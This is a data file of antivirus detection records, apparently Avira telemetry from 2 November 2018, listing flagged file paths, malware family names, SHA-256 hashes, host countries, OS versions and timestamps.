  Row(detection=Row(filename='avscan-20181102-054218-08379563', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054218-08379563', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:42:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050326-99dbb852', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050326-99DBB852', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:03:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-134715-24582eab', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-134715-24582EAB', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:50:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050706-1d5637cd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050706-1D5637CD', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:07:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='dealplylive.exe', filepath='\\\\?\\C:\\Program Files\\DealPlyLive\\Update\\DealPlyLive.exe', filesize=148000, name='ADWARE/DealPly.Gen4.#M300.#R300171'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:56:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-131519-c0490d28', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-131519-C0490D28', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:18:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-144155-5da06db1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ca086aae\\AVSCAN-20181102-144033-54B6A5F0\\AVSCAN-20181102-144155-5DA06DB1', filesize=20000, name='PUA/CryptoMiner.Gen.#M1.#R1'), hash='6311b05ecddcd0a31e8eeb7ebda701d6257f0a161a2cce498ef7bc517d1a822a', metadata=Row(cmdline=None, country='HR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:41:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-215833-6947b057', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d1d9e4d6\\AVSCAN-20181102-214641-FAB0748F\\AVSCAN-20181102-215833-6947B057', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='HK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:58:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='4b56f922fd9b0c4adb697ea3500f93d5e88ab0f090454c0677f42d94ccafd7cd', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\4B56F922FD9B0C4ADB697EA3500F93D5E88AB0F090454C0677F42D94CCAFD7CD', filesize=2112000, name='HEUR/AGEN.1006920.#M1.#R1'), hash='4b56f922fd9b0c4adb697ea3500f93d5e88ab0f090454c0677f42d94ccafd7cd', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-38.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-4.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\...\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-9.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-37.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T11:09:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='lancer.dll', filepath='\\\\?\\C:\\Program Files (x86)\\Prifotherprzaty\\_ALLOWDEL_5a3f\\Lancer.dll', filesize=256000, name='HEUR/AGEN.1018877.#M1.#R1'), hash='5c858bc04261896b1022fea1abd109078daabe60a063234654a0dbd153e3e980', metadata=Row(cmdline=None, country='RS', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T18:58:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='vidccleaner.exe', filepath='C:\\Program Files\\Xvid\\vidccleaner.exe', filesize=176000, name='W32/Ramnit.C.#M1.#R1'), hash='64f070a749b71c896ee3b6d58956461736eaa08560b725e86c3262c53d1e7aca', metadata=Row(cmdline='--engine=2 --session-id=hdAFfVn9FO5Jffy5IoWHz+OeffSDXdFzJSTFrQ8o --registry-suffix=ESET --enable-crash-reporting --srt-field-trial-group-name=NewCleanerUIExperiment', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\34.176.200\\software_reporter_tool.exe', parentsize=12211320, timestamp='2018-11-02T13:01:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061653-dcb9a05e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061653-DCB9A05E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:16:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060057-a2dcc9c9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060057-A2DCC9C9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:00:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052726-f41b5668', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052726-F41B5668', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:27:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060344-069d9529', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060344-069D9529', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:03:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052313-5da1b001', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052313-5DA1B001', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:23:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061158-2d227725', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061158-2D227725', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:11:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052400-795483dd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052400-795483DD', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:23:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054046-d10b5984', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054046-D10B5984', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:40:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062649-4034e0ef', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062649-4034E0EF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:26:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050945-7bd1b323', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050945-7BD1B323', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:09:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055006-1edaeeff', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055006-1EDAEEFF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052852-27b284ee', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052852-27B284EE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:28:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061350-6f8e7478', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061350-6F8E7478', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:13:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050429-bf6af9b3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050429-BF6AF9B3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:04:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052424-87cf3d99', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052424-87CF3D99', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:24:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053549-202c2731', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053549-202C2731', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:35:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061629-ce92169d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061629-CE92169D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:16:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051313-f7d107a5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051313-F7D107A5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:13:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061624-cba3933b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061624-CBA3933B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:16:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053619-3201f186', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053619-3201F186', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053917-9c37b86c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053917-9C37B86C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:39:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051326-ffb9f0b2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051326-FFB9F0B2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:13:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050826-4d0e012a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050826-4D0E012A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:08:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053314-c40af921', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053314-C40AF921', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:33:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055551-ec6f3834', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055551-EC6F3834', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:55:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060300-ec4e5e11', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060300-EC4E5E11', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:02:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054434-58f80e54', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054434-58F80E54', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:44:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054828-e4998a8e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054828-E4998A8E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:48:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T12:42:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054346-3c503629', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054346-3C503629', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:43:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055154-5f3939f6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055154-5F3939F6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:51:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062651-41847b51', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062651-41847B51', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:26:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T08:49:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062343-d12cce06', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062343-D12CCE06', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:23:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055104-4142a8cb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055104-4142A8CB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:51:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052557-bf83f495', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052557-BF83F495', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:25:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054345-3bc162f4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054345-3BC162F4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:43:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052401-7a379d63', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052401-7A379D63', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:24:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054329-3221aff2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054329-3221AFF2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:43:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T07:13:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055447-c6941f94', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055447-C6941F94', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:54:46Z'), dt=datetime.date(2018, 11, 2)),
